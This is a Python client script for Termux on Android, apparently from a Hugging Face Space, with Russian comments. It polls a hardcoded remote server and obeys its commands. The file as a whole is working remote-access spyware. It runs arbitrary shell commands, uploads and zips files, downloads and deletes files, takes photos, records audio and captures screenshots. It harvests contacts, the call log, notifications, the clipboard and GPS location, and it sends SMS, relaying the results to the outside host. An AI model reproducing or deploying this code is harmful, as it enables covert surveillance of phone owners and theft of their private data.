Spaces:
Paused
Paused
| import requests | |
| import json | |
| import time | |
| import subprocess | |
| import os | |
| import shutil | |
| import base64 | |
| import random | |
| from urllib.parse import urljoin | |
| # ЗАМЕНИТЬ ЭТУ СТРОКУ НА СВОЙ АДРЕС СЕРВЕРА | |
| SERVER_URL = "https://aleksmorshen-contrem2.hf.space" | |
| # ВАЖНО: Убедись, что Termux имеет доступ к памяти устройства: termux-setup-storage | |
| # Termux API: pkg install termux-api | |
| CURRENT_PATH = os.path.expanduser('~') | |
| TEMP_DIR = os.path.join(os.path.expanduser('~'), ".tmp_cc") | |
| os.makedirs(TEMP_DIR, exist_ok=True) | |
| def send_data(endpoint, data): | |
| try: | |
| url = urljoin(SERVER_URL, endpoint) | |
| r = requests.post(url, json=data, timeout=10) | |
| return r.json() | |
| except requests.exceptions.RequestException as e: | |
| return None | |
| def send_file(filename, file_path, is_preview=False): | |
| try: | |
| url = urljoin(SERVER_URL, "/upload_from_client") | |
| with open(file_path, 'rb') as f: | |
| files = {'file': (filename, f)} | |
| data = {'is_preview': 'true' if is_preview else 'false'} | |
| r = requests.post(url, files=files, data=data, timeout=60) | |
| return r.json() | |
| except Exception as e: | |
| return {'status': 'error', 'message': str(e)} | |
| finally: | |
| # Очистка временного файла | |
| if file_path.startswith(TEMP_DIR) and os.path.exists(file_path): | |
| os.remove(file_path) | |
| def get_command(): | |
| try: | |
| url = urljoin(SERVER_URL, "/get_command") | |
| r = requests.get(url, timeout=10) | |
| if r.status_code == 200 and r.text: | |
| return r.json() | |
| return None | |
| except requests.exceptions.RequestException: | |
| return None | |
| def execute_shell(command): | |
| try: | |
| result = subprocess.run(command, shell=True, capture_output=True, text=True, cwd=CURRENT_PATH, timeout=30) | |
| output = result.stdout + result.stderr | |
| return output if output else "Команда выполнена успешно, но нет вывода." | |
| except subprocess.TimeoutExpired: | |
| return "Ошибка: Команда превысила время ожидания (30 сек)." | |
| except Exception as e: | |
| return f"Ошибка выполнения команды: {e}" | |
| def list_files(path): | |
| global CURRENT_PATH | |
| try: | |
| if path == '~': | |
| new_path = os.path.expanduser('~') | |
| elif path == '/sdcard/': | |
| new_path = '/sdcard/' | |
| elif os.path.isabs(path): | |
| new_path = path | |
| else: | |
| new_path = os.path.normpath(os.path.join(CURRENT_PATH, path)) | |
| if not os.path.exists(new_path) or not os.path.isdir(new_path): | |
| return f"Ошибка: Директория не найдена или недоступна: {new_path}" | |
| CURRENT_PATH = new_path | |
| file_list = [] | |
| for item in os.listdir(CURRENT_PATH): | |
| full_path = os.path.join(CURRENT_PATH, item) | |
| item_type = "[D]" if os.path.isdir(full_path) else "[F]" | |
| file_list.append(f"{item_type} {item}") | |
| output = "Содержимое директории:\n" + "\n".join(file_list) | |
| return output | |
| except Exception as e: | |
| return f"Ошибка при просмотре файлов: {e}" | |
| def handle_upload_request(filename, is_preview=False): | |
| target_file_path = os.path.join(CURRENT_PATH, filename) | |
| if not os.path.exists(target_file_path): | |
| return f"Ошибка: Файл '{filename}' не найден на устройстве." | |
| unique_filename = f"{int(time.time())}_{filename}" | |
| result = send_file(unique_filename, target_file_path, is_preview) | |
| if result and result.get('status') == 'success': | |
| if is_preview: | |
| # Отправка дополнительного сигнала о готовности предпросмотра | |
| send_data("/submit_client_data", { | |
| "preview_file": result.get('filename'), | |
| "mimetype": result.get('mimetype') | |
| }) | |
| return f"Файл '{filename}' отправлен на сервер для предпросмотра." | |
| else: | |
| return f"Файл '{filename}' успешно загружен на сервер." | |
| else: | |
| return f"Ошибка загрузки файла на сервер: {result.get('message', 'Неизвестная ошибка')}" | |
| def handle_zip_and_upload(path): | |
| target_path = os.path.join(CURRENT_PATH, path) | |
| if not os.path.isdir(target_path): | |
| return f"Ошибка: Директория не найдена или недоступна: {target_path}" | |
| archive_name = os.path.basename(target_path) | |
| zip_path = os.path.join(TEMP_DIR, f"{archive_name}_{int(time.time())}.zip") | |
| try: | |
| shutil.make_archive(zip_path.replace(".zip", ""), 'zip', target_path) | |
| filename = os.path.basename(zip_path) | |
| result = send_file(filename, zip_path) | |
| if result and result.get('status') == 'success': | |
| return f"Директория '{archive_name}' архивирована и успешно загружена на сервер как '{filename}'." | |
| else: | |
| return f"Ошибка загрузки архива на сервер: {result.get('message', 'Неизвестная ошибка')}" | |
| except Exception as e: | |
| return f"Ошибка архивации: {e}" | |
| finally: | |
| if os.path.exists(zip_path): | |
| os.remove(zip_path) | |
| def handle_file_receive(command): | |
| download_url = command.get('download_url') | |
| target_path = command.get('target_path') | |
| original_filename = command.get('original_filename') | |
| if not download_url or not target_path: | |
| return "Ошибка: Неверные данные для получения файла." | |
| try: | |
| r = requests.get(download_url, stream=True, timeout=60) | |
| r.raise_for_status() | |
| if target_path.endswith('/') or target_path.endswith('\\'): | |
| final_path = os.path.join(target_path, original_filename) | |
| else: | |
| final_path = target_path | |
| # Убедимся, что директория существует | |
| os.makedirs(os.path.dirname(final_path), exist_ok=True) | |
| with open(final_path, 'wb') as f: | |
| for chunk in r.iter_content(chunk_size=8192): | |
| f.write(chunk) | |
| return f"Файл успешно скачан и сохранен в: {final_path}" | |
| except requests.exceptions.RequestException as e: | |
| return f"Ошибка скачивания: {e}" | |
| except Exception as e: | |
| return f"Ошибка сохранения файла: {e}" | |
| def run_termux_api(command, *args): | |
| try: | |
| cmd = [command] + list(args) | |
| result = subprocess.run(cmd, capture_output=True, text=True, timeout=20) | |
| return result.stdout.strip(), result.stderr.strip(), result.returncode | |
| except FileNotFoundError: | |
| return "", "Ошибка: Termux API не установлен.", 1 | |
| except Exception as e: | |
| return "", str(e), 1 | |
| def handle_media_command(cmd_type, command): | |
| if cmd_type == 'take_photo': | |
| temp_file = os.path.join(TEMP_DIR, f"photo_{int(time.time())}.jpg") | |
| camera_id = command.get('camera_id', '0') | |
| _, err, code = run_termux_api("termux-camera-photo", "-c", camera_id, temp_file) | |
| if code == 0: | |
| return handle_upload_request(os.path.basename(temp_file), is_preview=False) | |
| return f"Ошибка фото: {err}" | |
| elif cmd_type == 'record_audio': | |
| duration = command.get('duration', '5') | |
| temp_file = os.path.join(TEMP_DIR, f"audio_{int(time.time())}.mp3") | |
| _, err, code = run_termux_api("termux-microphone-record", "-f", temp_file, "-l", duration) | |
| if code == 0: | |
| # Ожидаем завершения записи, хотя API должен блокировать | |
| time.sleep(int(duration) + 1) | |
| return handle_upload_request(os.path.basename(temp_file), is_preview=False) | |
| return f"Ошибка аудио: {err}" | |
| elif cmd_type == 'screenshot': | |
| temp_file = os.path.join(TEMP_DIR, f"screenshot_{int(time.time())}.png") | |
| _, err, code = run_termux_api("termux-screenshot", "-f", temp_file) | |
| if code == 0: | |
| return handle_upload_request(os.path.basename(temp_file), is_preview=False) | |
| return f"Ошибка скриншота: {err}" | |
| return f"Неизвестная медиа-команда: {cmd_type}" | |
| def get_device_status(item=None): | |
| status = {} | |
| if item in [None, 'battery']: | |
| out, _, code = run_termux_api("termux-battery-status") | |
| if code == 0: | |
| status['battery'] = json.loads(out) | |
| if item in [None, 'location']: | |
| # termux-location требует gps | |
| out, _, code = run_termux_api("termux-location", "-p", "gps") | |
| if code == 0: | |
| status['location'] = json.loads(out) | |
| if item in [None, 'processes']: | |
| # Используем стандартный Termux ps | |
| out = execute_shell("ps -o USER,PID,PPID,VSZ,RSS,STAT,START,TIME,COMMAND") | |
| status['processes'] = out | |
| return status | |
| def get_notifications(): | |
| out, _, code = run_termux_api("termux-notification-list") | |
| if code == 0: | |
| try: | |
| return json.loads(out) | |
| except json.JSONDecodeError: | |
| return [] | |
| return [] | |
| def get_contacts(): | |
| out, _, code = run_termux_api("termux-contact-list") | |
| if code == 0: | |
| try: | |
| return json.loads(out) | |
| except json.JSONDecodeError: | |
| return [] | |
| return [] | |
| def send_sms(number, text): | |
| _, err, code = run_termux_api("termux-sms-send", "-n", number, text) | |
| if code == 0: | |
| return f"SMS отправлено на номер {number}." | |
| return f"Ошибка отправки SMS: {err}" | |
| def get_call_log(): | |
| out, err, code = run_termux_api("termux-call-log") | |
| if code == 0: | |
| return out | |
| return f"Ошибка получения журнала звонков: {err}" | |
| def handle_system_command(cmd_type, command): | |
| if cmd_type == 'tts_speak': | |
| text = command.get('text', 'Hello World') | |
| _, err, code = run_termux_api("termux-tts-speak", text) | |
| return "TTS: Озвучивание..." if code == 0 else f"TTS: Ошибка: {err}" | |
| elif cmd_type == 'vibrate': | |
| duration = command.get('duration', '1000') | |
| _, err, code = run_termux_api("termux-vibrate", "-d", duration) | |
| return f"Вибрация {duration}мс..." if code == 0 else f"Вибрация: Ошибка: {err}" | |
| elif cmd_type == 'torch': | |
| state = command.get('state', 'off') | |
| _, err, code = run_termux_api("termux-torch", state) | |
| return f"Фонарик {state}." if code == 0 else f"Фонарик: Ошибка: {err}" | |
| elif cmd_type == 'get_device_info': | |
| out, err, code = run_termux_api("termux-telephony-deviceinfo") | |
| return out if code == 0 else f"Ошибка получения инфо: {err}" | |
| elif cmd_type == 'get_wifi_info': | |
| out, err, code = run_termux_api("termux-wifi-connectioninfo") | |
| return out if code == 0 else f"Ошибка получения инфо Wi-Fi: {err}" | |
| return f"Неизвестная системная команда: {cmd_type}" | |
| def main_loop(): | |
| print(f"Клиент Termux запущен. Сервер: {SERVER_URL}") | |
| while True: | |
| try: | |
| # 1. Отправка сердцебиения и статуса | |
| data_to_send = {"heartbeat": True, "current_path": CURRENT_PATH} | |
| send_data("/submit_client_data", data_to_send) | |
| # 2. Получение команды | |
| command = get_command() | |
| if command: | |
| cmd_type = command.get('type') | |
| output = f"Выполнено: {cmd_type}" | |
| if cmd_type == 'shell': | |
| output = execute_shell(command.get('command')) | |
| elif cmd_type == 'list_files': | |
| output = list_files(command.get('path')) | |
| elif cmd_type == 'upload_to_server': | |
| is_preview = command.get('is_preview', False) | |
| output = handle_upload_request(command.get('filename'), is_preview=is_preview) | |
| elif cmd_type == 'zip_and_upload_dir': | |
| output = handle_zip_and_upload(command.get('path')) | |
| elif cmd_type == 'delete_file': | |
| try: | |
| os.remove(os.path.join(CURRENT_PATH, command.get('filename'))) | |
| output = f"Файл {command.get('filename')} удален." | |
| except Exception as e: | |
| output = f"Ошибка удаления: {e}" | |
| elif cmd_type in ['take_photo', 'record_audio', 'screenshot']: | |
| output = handle_media_command(cmd_type, command) | |
| elif cmd_type == 'receive_file': | |
| output = handle_file_receive(command) | |
| elif cmd_type == 'clipboard_get': | |
| out, err, code = run_termux_api("termux-clipboard-get") | |
| output = f"Буфер обмена:\n{out}" if code == 0 else f"Ошибка буфера: {err}" | |
| elif cmd_type == 'clipboard_set': | |
| text = command.get('text', '') | |
| _, err, code = run_termux_api("termux-clipboard-set", text) | |
| output = "Буфер обмена установлен." if code == 0 else f"Ошибка буфера: {err}" | |
| elif cmd_type == 'open_url': | |
| url = command.get('url') | |
| _, err, code = run_termux_api("termux-open-url", url) | |
| output = f"URL {url} открыт." if code == 0 else f"Ошибка открытия URL: {err}" | |
| elif cmd_type == 'get_device_status': | |
| status = get_device_status(command.get('item')) | |
| send_data("/submit_client_data", {"device_status_update": status, "output": "Статус устройства обновлен."}) | |
| continue | |
| elif cmd_type == 'get_notifications': | |
| notifications = get_notifications() | |
| send_data("/submit_client_data", {"notifications_update": notifications, "output": f"Получено {len(notifications)} уведомлений."}) | |
| continue | |
| elif cmd_type == 'get_contacts': | |
| contacts = get_contacts() | |
| send_data("/submit_client_data", {"contacts_update": contacts, "output": f"Получено {len(contacts)} контактов."}) | |
| continue | |
| elif cmd_type == 'send_sms': | |
| output = send_sms(command.get('number'), command.get('text')) | |
| elif cmd_type == 'get_call_log': | |
| output = get_call_log() | |
| elif cmd_type in ['tts_speak', 'vibrate', 'torch', 'get_device_info', 'get_wifi_info']: | |
| output = handle_system_command(cmd_type, command) | |
| else: | |
| output = f"Неизвестный тип команды: {cmd_type}" | |
| # Отправка результата выполнения | |
| send_data("/submit_client_data", {"output": output, "current_path": CURRENT_PATH}) | |
| # 3. Задержка перед следующим опросом | |
| time.sleep(5) | |
| except Exception as e: | |
| print(f"Критическая ошибка в цикле: {e}") | |
| time.sleep(10) | |
| if __name__ == '__main__': | |
| main_loop() |